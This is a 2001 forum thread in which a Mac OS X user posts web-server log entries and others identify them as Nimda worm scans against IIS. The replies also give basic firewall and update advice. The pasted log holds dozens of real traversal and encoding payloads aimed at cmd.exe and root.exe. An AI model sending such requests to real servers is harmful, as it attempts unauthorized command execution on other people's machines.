How sercure is OS X's Web Sharing and File Sharing?

PowerBookDude

Registered
I was just wondering how sercure is Mac OS 10.1's Web and File Sharing? Because I just started running both Web and File Sharing yesterday and today there is a lot of access. I was looking at the log file and I don't understand something What does this mean? (NOTE: I removed the IP address.)

- - [12/Oct/2001:12:12:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:12:12:12 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:12:12:12 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:12:17 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir
- - [12/Oct/2001:12:12:41 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:12:41 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:12:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:12:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:12:12:43 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:12:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:09 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:12:41:09 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:12:41:09 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:41:10 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:12:41:10 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:41:10 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:41:11 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:12:41:11 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:12:41:11 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:12 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:15 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
- - [12/Oct/2001:12:41:16 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:12:41:17 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:14:34:31 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
- - [12/Oct/2001:14:34:34 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
- - [12/Oct/2001:14:34:36 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:14:34:36 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
- - [12/Oct/2001:14:34:37 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
- - [12/Oct/2001:14:34:38 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:14:34:39 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
- - [12/Oct/2001:14:34:40 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
- - [12/Oct/2001:14:34:41 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

Also any tips for people running Web and File Sharing to make sure everything is sercure?
 

marmoset

Official Volunteer
Originally posted by PowerBookDude
I was just wondering how sercure is Mac OS 10.1's Web and File Sharing? Because I just started running both Web and File Sharing yesterday and today there is a lot of access. I was looking at the log file and I don't understand something What does this mean? (NOTE: I removed the IP address.)


{ nimda spew deleted - d.w. }

Also any tips for people running Web and File Sharing to make sure everything is sercure?
First, all the activity you are seeing is 0wned Microsoft IIS machines trying, fruitlessly, to infect you with the NIMDA worm. Being that you are running the Apache webserver platform on UNIX, you are immune to it. Those boxes were trying to infect you before you enabled Web Sharing too -- you just didn't have a piece of software listening on that port willing to log all of the attempts until now.

Apache is a solid, battle-tested web server. It's a very popular open source project, which means there are lots of sets of eyes looking at the code and correcting vulnerabilities before they can be widely exploited. In contrast, IIS is a closed project and arguably it was originally written with a pretty lax eye towards security. Only now that it has become a corporate embarassment has the developer focused upon securing it.

To keep up on security issues wrt OS X Web Sharing, I would suggest keeping an eye on http://www.apache.org and http://www.securityfocus.com
 

LordOphidian

Adjutant On-Line
Yep thats nimda. My personal rule for running a server is, Walk softly and carry the BAN stick. Basicly, if they start hitting you like this you can try to contact them if you can, or you can just block their requests to port 80 on your machine through your firewall.

Someone gets out of line? Ban them.

Check out BrickHouse (versiontracker.com) for a good app to set up your firewall with.
 

Soapvox

Want some of my Kool-aid?
Or better yet, if I have to do it by hand where are the httpd logs normally placed?
 
Top